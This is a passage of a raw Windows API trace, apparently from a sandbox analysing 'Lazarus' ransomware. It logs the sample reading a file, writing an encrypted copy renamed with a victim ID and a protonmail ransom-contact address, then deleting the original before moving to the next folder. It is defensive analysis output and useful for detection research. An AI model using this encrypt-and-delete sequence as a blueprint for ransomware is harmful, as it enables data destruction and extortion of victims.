[0068.053] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.053] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.053] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0068.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.053] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.053] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0068.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0068.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0068.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0068.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0068.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0068.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0068.054] AreFileApisANSI () returned 1 [0068.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0068.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 46 [0068.054] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58)) returned 1 [0068.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0068.054] AreFileApisANSI () returned 1 [0068.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0068.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0068.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0068.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.054] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0068.054] GetLastError () returned 0x0 [0068.054] SetLastError (dwErrCode=0x0) [0068.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e1b8 [0068.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0068.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bf40 [0068.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0068.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0068.055] GetLastError () returned 0x0 [0068.055] SetLastError (dwErrCode=0x0) [0068.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0068.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71688 [0068.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0068.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0068.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0068.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0068.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0068.055] AreFileApisANSI () returned 1 [0068.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0068.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0068.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0068.055] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.056] GetFileType (hFile=0x410) returned 0x1 [0068.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0068.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0068.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0068.056] AreFileApisANSI () returned 1 [0068.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0068.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 46 [0068.056] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.056] GetFileType (hFile=0x420) returned 0x1 [0068.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0068.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0068.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0068.057] GetLastError () returned 0x0 [0068.057] SetLastError (dwErrCode=0x0) [0068.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0068.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.057] GetLastError () returned 0x0 [0068.057] SetLastError (dwErrCode=0x0) [0068.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0068.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0068.057] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0068.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0068.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0068.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0068.059] GetLastError () returned 0x0 [0068.059] SetLastError (dwErrCode=0x0) [0068.059] GetLastError () returned 0x0 [0068.059] SetLastError (dwErrCode=0x0) [0068.060] GetLastError () returned 0x0 [0068.060] SetLastError (dwErrCode=0x0) [0068.060] GetLastError () returned 0x0 [0068.060] SetLastError (dwErrCode=0x0) [0068.060] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.060] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.061] GetLastError () returned 0x0 [0068.061] SetLastError (dwErrCode=0x0) [0068.061] GetLastError () returned 0x0 [0068.061] SetLastError (dwErrCode=0x0) [0068.062] GetLastError () returned 0x0 [0068.062] SetLastError (dwErrCode=0x0) [0068.062] GetLastError () returned 0x0 [0068.062] SetLastError (dwErrCode=0x0) [0068.062] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.062] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.062] GetLastError () returned 0x0 [0068.063] SetLastError (dwErrCode=0x0) [0068.063] GetLastError () returned 0x0 [0068.063] SetLastError (dwErrCode=0x0) [0068.063] GetLastError () returned 0x0 [0068.063] SetLastError (dwErrCode=0x0) [0068.063] GetLastError () returned 0x0 [0068.063] SetLastError (dwErrCode=0x0) [0068.063] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0xd58, lpOverlapped=0x0) returned 1 [0068.063] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.063] GetLastError () returned 0x0 [0068.063] SetLastError (dwErrCode=0x0) [0068.063] GetLastError () returned 0x0 [0068.063] SetLastError (dwErrCode=0x0) [0068.064] GetLastError () returned 0x0 [0068.064] SetLastError (dwErrCode=0x0) [0068.064] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0068.064] GetLastError () returned 0x0 [0068.064] SetLastError (dwErrCode=0x0) [0068.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0068.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0068.064] GetLastError () returned 0x0 [0068.064] SetLastError (dwErrCode=0x0) [0068.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0068.064] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0xd60, lpOverlapped=0x0) returned 1 [0068.064] GetLastError () returned 0x0 [0068.064] SetLastError (dwErrCode=0x0) [0068.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0068.065] GetLastError () returned 0x0 [0068.065] SetLastError (dwErrCode=0x0) [0068.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0068.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0068.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0068.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0068.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0068.065] CloseHandle (hObject=0x410) returned 1 [0068.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0068.066] CloseHandle (hObject=0x420) returned 1 [0068.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0068.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0068.067] AreFileApisANSI () returned 1 [0068.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0068.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 46 [0068.067] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.069] GetFileType (hFile=0x420) returned 0x1 [0068.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0068.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0068.069] GetLastError () returned 0xb7 [0068.069] SetLastError (dwErrCode=0xb7) [0068.069] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0068.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0068.070] CloseHandle (hObject=0x420) returned 1 [0068.070] AreFileApisANSI () returned 1 [0068.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0068.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 46 [0068.071] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll")) returned 1 [0068.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0068.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0068.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0068.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bf40 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0068.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.072] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4f1, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ƿ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧蜐\x07̧비聐薸\x08賂̧")) returned 0 [0068.072] FindClose (in: hFindFile=0x78710 | out: hFindFile=0x78710) returned 1 [0068.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0068.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0068.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0068.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0068.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0068.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0068.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0068.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0068.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0068.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0068.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0068.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0068.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0068.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0068.073] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.073] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.073] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.073] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0068.073] AreFileApisANSI () returned 1 [0068.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1042", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1042", lpUsedDefaultChar=0x0) returned 27 [0068.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.073] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.073] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0068.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0068.073] AreFileApisANSI () returned 1 [0068.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0068.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78450 [0068.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78450, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042") returned 27 [0068.074] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042" (normalized: "c:\\588bce7c90097ed212\\1042"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.074] GetLastError () returned 0x5 [0068.074] GetLastError () returned 0x5 [0068.074] SetLastError (dwErrCode=0x5) [0068.074] GetLastError () returned 0x5 [0068.074] SetLastError (dwErrCode=0x5) [0068.074] GetLastError () returned 0x5 [0068.074] SetLastError (dwErrCode=0x5) [0068.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78450 | out: hHeap=0x20000) returned 1 [0068.074] AreFileApisANSI () returned 1 [0068.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0068.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78490 [0068.074] MultiByteToWideChar (in: CodePage=0x0, 